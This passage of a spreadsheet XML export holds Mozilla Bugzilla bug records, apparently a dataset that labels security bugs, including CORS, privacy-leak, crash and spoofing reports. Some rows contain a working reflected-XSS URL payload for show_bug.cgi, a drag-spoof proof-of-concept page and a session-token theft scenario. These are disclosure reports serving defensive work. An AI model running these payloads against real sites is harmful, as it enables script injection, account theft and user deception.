        </is>
      </c>
      <c r="R4332" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4332" t="inlineStr">
        <is>
          <t>mozilla43</t>
        </is>
      </c>
      <c r="T4332" t="n">
        <v>1</v>
      </c>
      <c r="U4332" t="n">
        <v>0</v>
      </c>
      <c r="V4332" t="n">
        <v>13</v>
      </c>
      <c r="W4332" t="inlineStr">
        <is>
          <t>nsPreflightCache::GetCacheKey() has a bug that causes us to generate the same cache key for two preflight requests that only differ in the credentials flag.  This can cause us to bypass a CORS preflight in the following scenario:
* The page does an XHR without credentials which requires preflight.
* The preflight finishes successfully, and we store the result in the preflight cache.
* Before the cache entry expires, the page does an XHR with credentials but otherwise with the same preflight params as the first one.
* We mistakenly think that we have a preflight cache entry that allows us to connect to the remote server for the second XHR, and the page manages to send the XHR with credentials without a preflight.
Going back in the history, I think we have had this bug since forever.  It definitely predates bug 644476.  I didn't look back further.</t>
        </is>
      </c>
      <c r="X4332" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4333">
      <c r="A4333" t="n">
        <v>1448305</v>
      </c>
      <c r="B4333" t="inlineStr">
        <is>
          <t>2018-03-23 05:48:31 -0700</t>
        </is>
      </c>
      <c r="C4333" t="inlineStr">
        <is>
          <t>Private browsing mode leaks site visits via cached favicons</t>
        </is>
      </c>
      <c r="D4333" t="inlineStr">
        <is>
          <t>2024-05-30 09:44:11 -0700</t>
        </is>
      </c>
      <c r="E4333" t="n">
        <v>1</v>
      </c>
      <c r="F4333" t="n">
        <v>1</v>
      </c>
      <c r="G4333" t="n">
        <v>6</v>
      </c>
      <c r="H4333" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4333" t="inlineStr">
        <is>
          <t>Firefox for Android Graveyard</t>
        </is>
      </c>
      <c r="J4333" t="inlineStr">
        <is>
          <t>Favicon Handling</t>
        </is>
      </c>
      <c r="K4333" t="inlineStr">
        <is>
          <t>Firefox 60</t>
        </is>
      </c>
      <c r="L4333" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4333" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4333" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4333" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4333" t="inlineStr">
        <is>
          <t>--do_not_change--[priority:high][post-critsmash-triage][adv-main63+]</t>
        </is>
      </c>
      <c r="Q4333" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4333" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4333" t="inlineStr">
        <is>
          <t>Firefox 63</t>
        </is>
      </c>
      <c r="T4333" t="n">
        <v>1</v>
      </c>
      <c r="U4333" t="n">
        <v>0</v>
      </c>
      <c r="V4333" t="n">
        <v>44</v>
      </c>
      <c r="W4333" t="inlineStr">
        <is>
          <t>Created attachment 8961729
xvideos.png
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:52.0) Gecko/20100101 Firefox/52.0
Build ID: 20100101
Steps to reproduce:
1. Open Firefox for Android
2. Open new tab
3. Visit sites:
    a. https://xvideos.com
    b. http://spiegel.de
4. Close the browser
5. Restart the browser
Actual results:
Domains with touch-icon in HTML seem to leave an entry in `cache/icons` folder.
Furthermore, it also reveals the number of page loads, because new unique page seems to save a new entry for the touch-icon.
As in the screenshot you can see, I visited three different pages on spiegel.de, and it saved touch icon three times.
Screenshots attached.
Expected results:
Expectation is: Private browsing does not leave any footprint on the device about domains visited.
But in this case, domains can be known. Also, I did not check, but the cache file name looks like a hash, did not confirm if it's hash based on a URL or not.</t>
        </is>
      </c>
      <c r="X4333" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4334">
      <c r="A4334" t="n">
        <v>642734</v>
      </c>
      <c r="B4334" t="inlineStr">
        <is>
          <t>2011-03-17 23:35:50 -0700</t>
        </is>
      </c>
      <c r="C4334" t="inlineStr">
        <is>
          <t>Crash [@ nsTArray_base&lt;nsTArrayDefaultAllocator&gt;::Length()] [@ nsCharSinkTraits&lt;CalculateUTF8Size&gt;::write] [@ gfxUserFontSet::LoadNext] [@ ashed)  0  xul.dll!CalculateUTF8Size::write(unsigned short const *,unsigned int)]with downloaded font</t>
        </is>
      </c>
      <c r="D4334" t="inlineStr">
        <is>
          <t>2015-10-16 11:38:28 -0700</t>
        </is>
      </c>
      <c r="E4334" t="n">
        <v>1</v>
      </c>
      <c r="F4334" t="n">
        <v>1</v>
      </c>
      <c r="G4334" t="n">
        <v>3</v>
      </c>
      <c r="H4334" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4334" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4334" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K4334" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4334" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4334" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4334" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4334" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4334" t="inlineStr">
        <is>
          <t>[sg:critical?] fixed by (dupe) of 650639 [qa-examined-192]</t>
        </is>
      </c>
      <c r="Q4334" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4334" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4334" t="inlineStr">
        <is>
          <t>mozilla6</t>
        </is>
      </c>
      <c r="T4334" t="n">
        <v>1</v>
      </c>
      <c r="U4334" t="n">
        <v>0</v>
      </c>
      <c r="V4334" t="n">
        <v>26</v>
      </c>
      <c r="W4334" t="inlineStr">
        <is>
          <t>1. http://www.arlovance.com/
2. sometimes crash. 
I haven't been able to reproduce locally on Mac OS X or Windows XP, but the automation has so far crashed on Windows 7 32bit, Fedora 14 32bit and 64bit. I have been able to reproduce locally on Fedora 14 32bit especially when running under gdb. I wasn't able to crash a nightly Linux build however. YMMV.
associated socorro signature: gfxUserFontSet::LoadNext 
Operating system: Windows NT
                  6.1.7601 Service Pack 1
CPU: x86
     GenuineIntel family 6 model 44 stepping 2
     1 CPU
Crash reason:  EXCEPTION_ACCESS_VIOLATION_READ
Crash address: 0xffffffffdddddddd
Thread 0 (crashed)
 0  xul.dll!nsTArray_base&lt;nsTArrayDefaultAllocator&gt;::Length() [nsTArray.h : 139 + 0x5]
    eip = 0x635d33bc   esp = 0x0017c394   ebp = 0x0017c398   ebx = 0x00000001
    esi = 0x00343e20   edi = 0x00000000   eax = 0x04c28238   ecx = 0xdddddddd
    edx = 0x04b55820   efl = 0x00010202
    Found by: given as instruction pointer in context
 1  xul.dll!gfxMixedFontFamily::RemoveFontEntry(gfxFontEntry *) [gfxUserFontSet.h : 113 + 0xa]
    eip = 0x63b193f4   esp = 0x0017c3a0   ebp = 0x0017c3b0
    Found by: call frame info
 2  xul.dll!gfxUserFontSet::LoadNext(gfxProxyFontEntry *) [gfxUserFontSet.cpp : 691 + 0xb]
    eip = 0x63b191ee   esp = 0x0017c3b8   ebp = 0x0017c7f0
    Found by: call frame info
 3  xul.dll!gfxUserFontSet::OnLoadComplete(gfxFontEntry *,unsigned char const *,unsigned int,unsigned int) [gfxUserFontSet.cpp : 586 + 0xe]
    eip = 0x63b17fe3   esp = 0x0017c7f8   ebp = 0x0017ce78
    Found by: call frame info
 4  xul.dll!nsFontFaceLoader::OnStreamComplete(nsIStreamLoader *,nsISupports *,unsigned int,unsigned int,unsigned char const *) [nsFontFaceLoader.cpp : 226 + 0x1f]
    eip = 0x63f12a7a   esp = 0x0017ce80   ebp = 0x0017cefc
    Found by: call frame info
 5  xul.dll!nsStreamLoader::OnStopRequest(nsIRequest *,nsISupports *,unsigned int) [nsStreamLoader.cpp : 125 + 0x3d]
    eip = 0x63bc4cc6   esp = 0x0017cf04   ebp = 0x0017cf24
    Found by: call frame info
Operating system: Linux
                  0.0.0 Linux 2.6.35.11-83.fc14.i686.PAE #1 SMP Mon Feb 7 06:57:55 UTC 2011 i686
CPU: x86
     GenuineIntel family 6 model 44 stepping 2
     1 CPU
Crash reason:  SIGSEGV
Crash address: 0x0
Thread 0 (crashed)
 0  libxul.so!nsTArray_base&lt;nsTArrayDefaultAllocator&gt;::Length [nsTArray.h : 139 + 0x5]
    eip = 0x00b1b84e   esp = 0xbf986d38   ebp = 0xbf986d38   ebx = 0x02ec255c
    esi = 0x08a70b90   edi = 0x00000020   eax = 0x00000000   ecx = 0x02ec255c
    edx = 0x00000004   efl = 0x00010216
    Found by: given as instruction pointer in context
 1  libxul.so!gfxMixedFontFamily::RemoveFontEntry [gfxUserFontSet.h : 113 + 0xd]
    eip = 0x021e5a78   esp = 0xbf986d40   ebp = 0xbf986d68   ebx = 0x02ec255c
    esi = 0x08a70b90   edi = 0x00000020
    Found by: call frame info
 2  libxul.so!gfxUserFontSet::LoadNext [gfxUserFontSet.cpp : 691 + 0x11]
    eip = 0x021e54db   esp = 0xbf986d70   ebp = 0xbf987118   ebx = 0x02ec255c
    esi = 0x08a70b90   edi = 0x00000020
    Found by: call frame info
 3  libxul.so!gfxUserFontSet::OnLoadComplete [gfxUserFontSet.cpp : 586 + 0x11]
    eip = 0x021e4e78   esp = 0xbf987120   ebp = 0xbf9876a8   ebx = 0x02ec255c
    esi = 0x095af330   edi = 0x0000b9c8
    Found by: call frame info
 4  libxul.so!nsFontFaceLoader::OnStreamComplete [nsFontFaceLoader.cpp : 226 + 0x31]
    eip = 0x00fd1540   esp = 0xbf9876b0   ebp = 0xbf987738   ebx = 0x02ec255c
    esi = 0x095af330   edi = 0x0000b9c8
    Found by: call frame info
 5  libxul.so!nsStreamLoader::OnStopRequest [nsStreamLoader.cpp : 125 + 0x4b]
    eip = 0x00bb5820   esp = 0xbf987740   ebp = 0xbf987788   ebx = 0x02ec255c
    esi = 0x095af330   edi = 0x0000b9c8
    Found by: call frame info
Operating system: Linux
                  0.0.0 Linux 2.6.35.11-83.fc14.i686.PAE #1 SMP Mon Feb 7 06:57:55 UTC 2011 i686
CPU: x86
     GenuineIntel family 6 model 44 stepping 2
     1 CPU
Crash reason:  SIGSEGV
Crash address: 0x9d36000
Thread 0 (crashed)
 0  libxul.so!nsCharSinkTraits&lt;CalculateUTF8Size&gt;::write [nsUTF8Utils.h : 604 + 0x3]
    eip = 0x01d60b00   esp = 0xbfb9b4b0   ebp = 0xbfb9b4f8   ebx = 0x02b2155c
    esi = 0x006f0063   edi = 0x00005e24   eax = 0x09d36000   ecx = 0x02da234c
    edx = 0x00273410   efl = 0x00010202
    Found by: given as instruction pointer in context
 1  libxul.so!copy_string&lt;nsReadingIterator&lt;short unsigned int&gt;, CalculateUTF8Size&gt; [nsAlgorithm.h : 93 + 0x31]
    eip = 0x01d5fd8a   esp = 0xbfb9b500   ebp = 0xbfb9b518   ebx = 0x02b2155c
    esi = 0x006f0063   edi = 0x00005e24
    Found by: call frame info
 2  libxul.so!AppendUTF16toUTF8 [nsReadableUtils.cpp : 200 + 0x12]
    eip = 0x01d5df9d   esp = 0xbfb9b520   ebp = 0xbfb9b578   ebx = 0x02b2155c
    esi = 0xbfb9b550   edi = 0x00005e24
    Found by: call frame info
 3  libxul.so!NS_ConvertUTF16toUTF8::NS_ConvertUTF16toUTF8 [nsString.h : 161 + 0x11]
    eip = 0x00776061   esp = 0xbfb9b580   ebp = 0xbfb9b598   ebx = 0x02b2155c
    esi = 0x09a8af50   edi = 0x00005e24
    Found by: call frame info
 4  libxul.so!gfxUserFontSet::OnLoadComplete [gfxUserFontSet.cpp : 477 + 0x1c]
    eip = 0x01e43950   esp = 0xbfb9b5a0   ebp = 0xbfb9bb28   ebx = 0x02b2155c
    esi = 0x09a8af50   edi = 0x00005e24
    Found by: call frame info
 5  libxul.so!nsFontFaceLoader::OnStreamComplete [nsFontFaceLoader.cpp : 226 + 0x31]
    eip = 0x00c30540   esp = 0xbfb9bb30   ebp = 0xbfb9bbb8   ebx = 0x02b2155c
    esi = 0x09a8af50   edi = 0x00005e24
    Found by: call frame info
ss since Windows 7 showed deleted heap in the crash address and ecx.</t>
        </is>
      </c>
      <c r="X4334" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4335">
      <c r="A4335" t="n">
        <v>842038</v>
      </c>
      <c r="B4335" t="inlineStr">
        <is>
          <t>2013-02-16 08:30:18 -0800</t>
        </is>
      </c>
      <c r="C4335" t="inlineStr">
        <is>
          <t>[SECURITY] XSS in show_bug.cgi when using an invalid page format</t>
        </is>
      </c>
      <c r="D4335" t="inlineStr">
        <is>
          <t>2024-05-30 08:00:31 -0700</t>
        </is>
      </c>
      <c r="E4335" t="n">
        <v>1</v>
      </c>
      <c r="F4335" t="n">
        <v>1</v>
      </c>
      <c r="G4335" t="n">
        <v>4</v>
      </c>
      <c r="H4335" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4335" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J4335" t="inlineStr">
        <is>
          <t>Creating/Changing Bugs</t>
        </is>
      </c>
      <c r="K4335" t="inlineStr">
        <is>
          <t>2.10</t>
        </is>
      </c>
      <c r="L4335" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4335" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4335" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4335" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4335" t="inlineStr"/>
      <c r="Q4335" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4335" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4335" t="inlineStr">
        <is>
          <t>Bugzilla 3.6</t>
        </is>
      </c>
      <c r="T4335" t="n">
        <v>0</v>
      </c>
      <c r="U4335" t="n">
        <v>0</v>
      </c>
      <c r="V4335" t="n">
        <v>39</v>
      </c>
      <c r="W4335" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 5.1; rv:18.0) Gecko/20100101 Firefox/18.0
Build ID: 20130201065344
Steps to reproduce:
Hi,
I would like to report Cross site scripting vulnerability.
Steps to reproduce : 
Navigate
https://bugzilla.mozilla.org/show_bug.cgi?id=%22%3E%3Cimg%20src=%22aaa.jpg%22%20onerror=javascript:alert%28%27HappyBirthdayDone%27%29%3E&amp;format=123
Actual results:
JavaScript get executed.
Expected results:
Site should not execute the script and should filter metacharacter in
order to prevent XSS attacks and Bounty  :P</t>
        </is>
      </c>
      <c r="X4335" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4336">
      <c r="A4336" t="n">
        <v>636288</v>
      </c>
      <c r="B4336" t="inlineStr">
        <is>
          <t>2011-02-23 15:14:14 -0800</t>
        </is>
      </c>
      <c r="C4336" t="inlineStr">
        <is>
          <t>Create Cron Job for updating first reports and signaturedims</t>
        </is>
      </c>
      <c r="D4336" t="inlineStr">
        <is>
          <t>2011-12-28 10:40:11 -0800</t>
        </is>
      </c>
      <c r="E4336" t="n">
        <v>1</v>
      </c>
      <c r="F4336" t="n">
        <v>1</v>
      </c>
      <c r="G4336" t="n">
        <v>4</v>
      </c>
      <c r="H4336" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4336" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J4336" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4336" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4336" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4336" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4336" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4336" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4336" t="inlineStr"/>
      <c r="Q4336" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4336" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4336" t="inlineStr">
        <is>
          <t>1.7.7</t>
        </is>
      </c>
      <c r="T4336" t="n">
        <v>1</v>
      </c>
      <c r="U4336" t="n">
        <v>0</v>
      </c>
      <c r="V4336" t="n">
        <v>11</v>
      </c>
      <c r="W4336" t="inlineStr">
        <is>
          <t>Please create a python wrapper and cron job for updating the first appearance of signature information, as well as updating signature_productdims.  
This cron job should run on the same schedule as the TCBS cron job, i.e. once per hour, for a period 3 hours in the past.
This is the SQL you call:  
SELECT update_signature_matviews( some_time, hours_back, hours_window )
example:
SELECT update_signature_matviews( '2011-02-14 16:00:00', 3, 2 );
IMPORTANT: this cron job REPLACES the signature_productdims cronjob, which currently runs once per day.   Once this cron job is deployed, that one MUST be disabled.</t>
        </is>
      </c>
      <c r="X4336" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4337">
      <c r="A4337" t="n">
        <v>1027903</v>
      </c>
      <c r="B4337" t="inlineStr">
        <is>
          <t>2014-06-19 16:00:56 -0700</t>
        </is>
      </c>
      <c r="C4337" t="inlineStr">
        <is>
          <t>Please create a WebOps Request Form in Bugzilla</t>
        </is>
      </c>
      <c r="D4337" t="inlineStr">
        <is>
          <t>2015-07-24 12:01:17 -0700</t>
        </is>
      </c>
      <c r="E4337" t="n">
        <v>1</v>
      </c>
      <c r="F4337" t="n">
        <v>1</v>
      </c>
      <c r="G4337" t="n">
        <v>7</v>
      </c>
      <c r="H4337" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I4337" t="inlineStr">
        <is>
          <t>bugzilla.mozilla.org</t>
        </is>
      </c>
      <c r="J4337" t="inlineStr">
        <is>
          <t>Custom Bug Entry Forms</t>
        </is>
      </c>
      <c r="K4337" t="inlineStr">
        <is>
          <t>Production</t>
        </is>
      </c>
      <c r="L4337" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4337" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4337" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4337" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4337" t="inlineStr"/>
      <c r="Q4337" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4337" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4337" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4337" t="n">
        <v>1</v>
      </c>
      <c r="U4337" t="n">
        <v>0</v>
      </c>
      <c r="V4337" t="n">
        <v>19</v>
      </c>
      <c r="W4337" t="inlineStr">
        <is>
          <t>Created attachment 8443111
20140612_090049.jpg
The WebOps team wants to create a WebOps Request Form in Bugzilla that would take the answers to a number of questions and automatically file a single bug using the contents of the form.
We are trying to improve our ability to respond to requests by simplifying the request while improving our understanding of the request.
Tests:
Given that the new form exists and that a new Component called "WebOps: Request" exists, when the requestor creates a new bug and selects the "Infrastructure &amp; Operations :: WebOps: Request" product/component, the new form will be displayed.
Given that the new form is displayed, only the following field should be displayed:
1. Summary
2. What are you asking us to do?
3. What is the problem you are trying to solve?
4. How would you solve this problem?  How has this problem been solved in the past?
5. Who might be impacted by this change?
6. What are the known dependencies for this request?
7. CC
8. Depends on
9. Blocks
Given that all the fields are displayed, the answers to questions 2, 3, 4, 5, and 6 should be stored in the standard “Description” field, along with their question.  For example:
Description:
What are you asking us to do?
Please renew SSL cert.
Given that the form is filled out, when the requestor presses the “Submit Bug” button the form contents will be saved to a new bug.
Given that the bug is created, the Summary field should be populated (required), the Reporter field should be automatically populated with the email address of the requestor and answers to questions 2 and 3 should be populated (required).  All other field values should be stored as optional in their standard fields.
Please see attached picture for more information about what fields should not be included on the form (x'd out).</t>
        </is>
      </c>
      <c r="X4337" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4338">
      <c r="A4338" t="n">
        <v>1036213</v>
      </c>
      <c r="B4338" t="inlineStr">
        <is>
          <t>2014-07-08 18:10:05 -0700</t>
        </is>
      </c>
      <c r="C4338" t="inlineStr">
        <is>
          <t>[SECURITY] Add '/**/' before jsonrpc.cgi callback to avoid swf content type sniff vulnerability</t>
        </is>
      </c>
      <c r="D4338" t="inlineStr">
        <is>
          <t>2024-05-30 08:35:38 -0700</t>
        </is>
      </c>
      <c r="E4338" t="n">
        <v>1</v>
      </c>
      <c r="F4338" t="n">
        <v>1</v>
      </c>
      <c r="G4338" t="n">
        <v>4</v>
      </c>
      <c r="H4338" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4338" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J4338" t="inlineStr">
        <is>
          <t>WebService</t>
        </is>
      </c>
      <c r="K4338" t="inlineStr">
        <is>
          <t>3.7.1</t>
        </is>
      </c>
      <c r="L4338" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4338" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4338" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4338" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4338" t="inlineStr"/>
      <c r="Q4338" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4338" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4338" t="inlineStr">
        <is>
          <t>Bugzilla 4.0</t>
        </is>
      </c>
      <c r="T4338" t="n">
        <v>1</v>
      </c>
      <c r="U4338" t="n">
        <v>0</v>
      </c>
      <c r="V4338" t="n">
        <v>21</v>
      </c>
      <c r="W4338" t="inlineStr">
        <is>
          <t>Created attachment 8452810
poc.html
User Agent: Mozilla/5.0 (X11; Linux i686 (x86_64)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36
Steps to reproduce:
Hi,
I think you may already know about this vulnerability(no, take a look - miki.it/blog/2014/7/8/abusing-jsonp-with-rosetta-flash/)
this vulnerability allows the page jsonrpc.cgi as a swf file then resulting in http request in local webserver(bugzilla.mozilla.org). To patch that add '/**/' before the callback function.
Reproduce:
1. Log in bugzilla.
2. open poc.html(attached)
3. wait 10 seconds
4. you will be redirected to a page that contains the source code of 'bugzilla.mozilla.org'(was got via victim browser) so it contains your session security token.
Cheers,</t>
        </is>
      </c>
      <c r="X4338" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4339">
      <c r="A4339" t="n">
        <v>724599</v>
      </c>
      <c r="B4339" t="inlineStr">
        <is>
          <t>2012-02-06 10:28:22 -0800</t>
        </is>
      </c>
      <c r="C4339" t="inlineStr">
        <is>
          <t>[CAL-2012-0001]Spoof after a URL is dragged to location bar, by canceling the load</t>
        </is>
      </c>
      <c r="D4339" t="inlineStr">
        <is>
          <t>2014-08-15 10:15:21 -0700</t>
        </is>
      </c>
      <c r="E4339" t="n">
        <v>1</v>
      </c>
      <c r="F4339" t="n">
        <v>1</v>
      </c>
      <c r="G4339" t="n">
        <v>2</v>
      </c>
      <c r="H4339" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4339" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J4339" t="inlineStr">
        <is>
          <t>Address Bar</t>
        </is>
      </c>
      <c r="K4339" t="inlineStr">
        <is>
          <t>10 Branch</t>
        </is>
      </c>
      <c r="L4339" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4339" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4339" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4339" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4339" t="inlineStr">
        <is>
          <t>[sg:moderate][advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q4339" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4339" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4339" t="inlineStr">
        <is>
          <t>Firefox 14</t>
        </is>
      </c>
      <c r="T4339" t="n">
        <v>1</v>
      </c>
      <c r="U4339" t="n">
        <v>0</v>
      </c>
      <c r="V4339" t="n">
        <v>43</v>
      </c>
      <c r="W4339" t="inlineStr">
        <is>
          <t>[CAL-2012-0001]firefox drag spoof vulnerability
1 Affected Products
=================
tested Firefox 9.0.1
tested Firefox 10.0
2 Vulnerability Details
=====================
Code Audit Labs of vulnhunt.com had discovered a vulnerability in Firefox 10.0 which does not properly handle drag and drop operations on URL strings, which allows user-assisted remote attackers to spoof the Omnibox.
this issue is also affect chrome . we also reported to chrome ,they are addressing the vulnerability now.
3 Analysis
=========
N/A
4 Crash info:
===============
N/A
5 POC:
====
&lt;title&gt;Drag spoof testcase by Code Audit Labs of VulnHunt.com&lt;/title&gt;
&lt;body draggable="true"&gt;
&lt;h3&gt;&lt;a href="http://www.google.com" id="a"&gt;Drag me to address bar&lt;/a&gt;&lt;/h3&gt;
&lt;h3 id="note" style="display:none;"&gt;I am not google at all&lt;/h3&gt;
&lt;/body&gt;
&lt;script&gt;
ondragend = function(){
  stop();
  document.title = 'Done';
  a.style.display = 'none';
  note.style.display = 'block';
}
&lt;/script&gt;
6 About Code Audit Labs:
=====================
Code Audit Labs secure your software,provide Professional include source
code audit and binary code audit service.
Code Audit Labs:" You create value for customer,We protect your value"
http://www.VulnHunt.com</t>
        </is>
      </c>
      <c r="X4339" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4340">
      <c r="A4340" t="n">
        <v>817841</v>
      </c>
      <c r="B4340" t="inlineStr">
        <is>
          <t>2012-12-03 15:26:19 -0800</t>
        </is>
      </c>
      <c r="C4340" t="inlineStr">
        <is>
          <t>Race condition deleting nsDOMMediaStream via proxying to MainThread</t>
        </is>
      </c>
      <c r="D4340" t="inlineStr">
        <is>
          <t>2014-11-19 19:37:32 -0800</t>
        </is>
      </c>
      <c r="E4340" t="n">
        <v>1</v>
      </c>
      <c r="F4340" t="n">
        <v>1</v>
      </c>
      <c r="G4340" t="n">
        <v>3</v>
      </c>
      <c r="H4340" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4340" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4340" t="inlineStr">
        <is>
          <t>WebRTC: Audio/Video</t>
        </is>
      </c>
      <c r="K4340" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4340" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4340" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4340" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4340" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4340" t="inlineStr">
        <is>
          <t>[qa-][adv-main20+]</t>
        </is>
      </c>
      <c r="Q4340" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4340" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4340" t="inlineStr">
        <is>
          <t>mozilla20</t>
        </is>
      </c>
      <c r="T4340" t="n">
        <v>1</v>
      </c>
      <c r="U4340" t="n">
        <v>0</v>
      </c>
      <c r="V4340" t="n">
        <v>14</v>
      </c>
      <c r="W4340" t="inlineStr">
        <is>
          <t>We have a number of hard-to-reproduce reports of crashes due to a Release off-main-thread in ~MediaOperationRunnable(), which deletes a nsDOMMediaStream (which is a cycle-collected object, and thus main-thread only).
It tries to proxy to mainthread by resending itself there and letting the post-Run release kill it, but if MainThread runs *before* the off-main-thread Run() exists, it gets deleted off-main-thread (boom).
A better solution (though it means allocating) is to proxy to main thread just the Release() via NS_ProxyRelease().  This code isn't a performance hotspot so the alloc is not a big deal.</t>
        </is>
      </c>
      <c r="X4340" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4341">
      <c r="A4341" t="n">
        <v>87490</v>
      </c>
      <c r="B4341" t="inlineStr">
        <is>
          <t>2001-06-23 21:36:32 -0700</t>
        </is>
      </c>
      <c r="C4341" t="inlineStr">
        <is>
          <t>Keyboard focus lost after pressing "Manage Profiles..." button</t>
        </is>
      </c>
      <c r="D4341" t="inlineStr">
        <is>
          <t>2019-05-03 14:53:27 -0700</t>
        </is>
      </c>
      <c r="E4341" t="n">
        <v>1</v>
      </c>
      <c r="F4341" t="n">
        <v>1</v>
      </c>
      <c r="G4341" t="n">
        <v>3</v>
      </c>
      <c r="H4341" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4341" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4341" t="inlineStr">
        <is>
          <t>DOM: UI Events &amp; Focus Handling</t>
        </is>
      </c>
      <c r="K4341" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4341" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4341" t="inlineStr">
        <is>
          <t>Windows 98</t>
        </is>
      </c>
